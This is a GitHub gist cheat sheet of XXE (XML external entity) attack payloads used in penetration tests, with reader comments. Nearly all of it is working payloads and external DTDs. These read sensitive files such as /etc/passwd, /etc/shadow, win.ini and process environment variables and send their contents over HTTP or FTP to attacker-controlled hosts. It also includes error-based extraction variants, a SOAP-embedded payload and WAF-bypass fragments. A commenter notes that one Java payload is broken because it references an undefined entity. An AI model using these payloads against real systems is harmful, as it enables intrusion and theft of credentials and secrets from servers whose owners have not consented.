-
-
Save staaldraad/01415b990939494879b4 to your computer and use it in GitHub Desktop.
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> | |
--------------------------------------------------------------- | |
OoB extraction | |
--------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml"> | |
%sp; | |
%param1; | |
]> | |
<r>&exfil;</r> | |
## External dtd: ## | |
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> | |
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>"> | |
---------------------------------------------------------------- | |
OoB variation of above (seems to work better against .NET) | |
---------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml"> | |
%sp; | |
%param1; | |
%exfil; | |
]> | |
## External dtd: ## | |
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> | |
<!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://x.x.x.x:443/?%data;'>"> | |
--------------------------------------------------------------- | |
OoB extraction | |
--------------------------------------------------------------- | |
<?xml version="1.0"?> | |
<!DOCTYPE r [ | |
<!ENTITY % data3 SYSTEM "file:///etc/shadow"> | |
<!ENTITY % sp SYSTEM "http://EvilHost:port/sp.dtd"> | |
%sp; | |
%param3; | |
%exfil; | |
]> | |
## External dtd: ## | |
<!ENTITY % param3 "<!ENTITY % exfil SYSTEM 'ftp://Evilhost:port/%data3;'>"> | |
----------------------------------------------------------------------- | |
OoB extra ERROR -- Java | |
----------------------------------------------------------------------- | |
<?xml version="1.0"?> | |
<!DOCTYPE r [ | |
<!ENTITY % data3 SYSTEM "file:///etc/passwd"> | |
<!ENTITY % sp SYSTEM "http://x.x.x.x:8080/ss5.dtd"> | |
%sp; | |
%param3; | |
%exfil; | |
]> | |
<r></r> | |
## External dtd: ## | |
<!ENTITY % param1 '<!ENTITY % external SYSTEM "file:///nothere/%payload;">'> %param1; %external; | |
----------------------------------------------------------------------- | |
OoB extra nice | |
----------------------------------------------------------------------- | |
<?xml version="1.0" encoding="utf-8"?> | |
<!DOCTYPE root [ | |
<!ENTITY % start "<![CDATA["> | |
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml "> | |
<!ENTITY % end "]]>"> | |
<!ENTITY % dtd SYSTEM "http://evil/evil.xml"> | |
%dtd; | |
]> | |
<root>&all;</root> | |
## External dtd: ## | |
<!ENTITY all "%start;%stuff;%end;"> | |
------------------------------------------------------------------ | |
File-not-found exception based extraction | |
------------------------------------------------------------------ | |
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE test [ | |
<!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" > | |
%one; | |
%two; | |
%four; | |
]> | |
## External dtd: ## | |
<!ENTITY % three SYSTEM "file:///etc/passwd"> | |
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>"> | |
-------------------------^ you might need to encode this % (depends on your target) as: % | |
-------------- | |
FTP | |
-------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE a [ | |
<!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd"> | |
%asd; | |
%c; | |
]> | |
<a>&rrr;</a> | |
## External dtd ## | |
<!ENTITY % d SYSTEM "file:///proc/self/environ"> | |
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>"> | |
--------------------------- | |
Inside SOAP body | |
--------------------------- | |
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body> | |
--------------------------- | |
Untested - WAF Bypass | |
--------------------------- | |
<!DOCTYPE :. SYTEM "http://" | |
<!DOCTYPE :_-_: SYTEM "http://" | |
<!DOCTYPE {0xdfbf} SYSTEM "http://" |
Hi, sorry for the delay. Turns out I don't get notifications on gist comments, or I missed it somehow.
These are largely a collection of different payloads I've used on assessments. Some I found for myself, while others I've picked up from blog-posts. I'm sure there is a big overlap with the link you posted, and there are some awesome payloads in there that I haven't tried, thanks!
With the OOB error based, I copied that from the work done by NetSPi : https://blog.netspi.com/forcing-xxe-reflection-server-error-messages/
They explain the mechanics really well 👍
Alright. Thanks.
Thanks, but any payloads/methods for the XSS if html encoding is implement?
pull request to seclist pls? :)
really good~ thanks
The <!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>
part might not work if your XML parser doesn't do URL encoding ootb (will report "incorrect url").
@adamczi any workaround for if XML parser doesn't do URL encoding ootb ?
@Shapa7276 haven't found, it's just that it accepts only alphanumeric stuff in there, so if you can somehow filter out special chars, it will work normally.
Hello guys,
Firstly thank you for this job, I tried this kind of payload, i'm stuck :
Parser payload :
<?xml version="1.0" ?>
<!DOCTYPE message [
<!ENTITY % ext SYSTEM "http://@evilServer:8000/ev.dtd">
%ext;
]>
<message></message>
External ev.dtd :
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
Evil server LOG :
[31/Jul/2020 13:05:07] "GET /ev.dtd HTTP/1.0" 200 -
Error message in server :
File "http://EvilServer:8000/ev.dtd", line 2
lxml.etree.XMLSyntaxError: Detected an entity reference loop, line 2, column 77
Can you help me please ?
@staaldraad there is an error in the "OoB extra ERROR -- Java" payload - the DTD file should say "file:///nothere/%data3;"
as the %payload
entity doesn't exist.
Thanks it's useful
ygiobrmctie74tz4chetsq3omfs7gw.burpcollaborator.net
Thanks for these attack vectors, they are really helpful. ##
@staaldraad am just a newbie in this stuff so please, i need some clarification. I suppose that OOB extra ERROR --Java is meant to produce an error so as to get to know the inner working of the application and the File-not-found exception based extraction code is doing the same. Please help correct me or with a better explanation for those codes. Have you discovered some new XXE attack vectors which are totally different from what is here --> http://web-in-security.blogspot.it/2016/03/xxe-cheat-sheet.html .